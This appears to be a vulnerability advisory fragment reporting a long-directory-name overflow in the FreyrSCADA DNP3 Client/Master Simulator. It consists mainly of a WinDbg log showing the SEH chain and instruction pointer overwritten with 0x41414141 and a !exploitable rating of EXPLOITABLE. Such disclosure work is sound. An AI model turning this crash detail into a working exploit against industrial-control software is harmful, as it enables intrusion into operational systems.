When file transfer support is enabled, the application fails to parse overly long directory names.
0:001> g
ModLoad: 76000000 76083000 C:\Windows\system32\CLBCatQ.DLL
ModLoad: 72860000 728b8000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 74f80000 74fbc000 C:\Windows\system32\mswsock.dll
ModLoad: 74ad0000 74ad5000 C:\Windows\System32\wshtcpip.dll
(a40.6c0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=032cfefc ebx=01cd5240 ecx=00000000 edx=41414141 esi=00000002 edi=032cfe60
eip=0046d618 esp=032cfd44 ebp=032cfd54 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** WARNING: Unable to verify checksum for C:\Program Files\FreyrSCADA Embedded Solution\DNP3 Client-Master Simulator\FreyrDNPClientSim.exe
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\FreyrSCADA Embedded Solution\DNP3 Client-Master Simulator\FreyrDNPClientSim.exe -
FreyrDNPClientSim!Unit9Finalize+0x33614:
0046d618 8b4af8 mov ecx,dword ptr [edx-8] ds:0023:41414139=????????
0:004> !exchain
032cfeb8: 41414141
Invalid exception stack at 41414141
0:004> g
(a40.6c0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=774371cd esi=00000000 edi=00000000
eip=41414141 esp=032cf818 ebp=032cf838 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
41414141 ?? ???
0:004> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at Unknown Symbol @ 0x0000000041414141 called from ntdll!RtlRaiseStatus+0x00000000000000b4 (Hash=0x3c79292c.0x49336407)
Access violations at the instruction pointer are exploitable if not near NULL.
0:004> lmvm FreyrDNPClientSim
start end module name
00400000 007dd000 FreyrDNPClientSim C (export symbols) C:\Program Files\FreyrSCADA Embedded Solution\DNP3 Client-Master Simulator\FreyrDNPClientSim.exe
Loaded symbol image file: C:\Program Files\FreyrSCADA Embedded Solution\DNP3 Client-Master Simulator\FreyrDNPClientSim.exe
Image path: C:\Program Files\FreyrSCADA Embedded Solution\DNP3 Client-Master Simulator\FreyrDNPClientSim.exe
Image name: FreyrDNPClientSim.exe
Timestamp: Sat Feb 08 21:24:49 2020 (5E3F8991)
CheckSum: 00000000
ImageSize: 003DD000
File version: 21.4.22.0
Product version: 21.4.22.0
File flags: 2 (Mask 3F) Pre-release
File OS: 4 Unknown Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04e4
CompanyName: FreyrSCADA
ProductName: DNP3 Client / Master Simulator - Demo
InternalName: FreyrDNPClientSim.exe
OriginalFilename: FreyrDNPClientSim.exe
ProductVersion: 21.04.022
FileVersion: 21.4.22.0
FileDescription: DNP3 Client Simulator - Demo
LegalCopyright: ©2020, www.freyrscada.com, All Rights Reserved
LegalTrademarks: FreyrSCADA
Comments: DNP3 Client / Master Simulator - Demo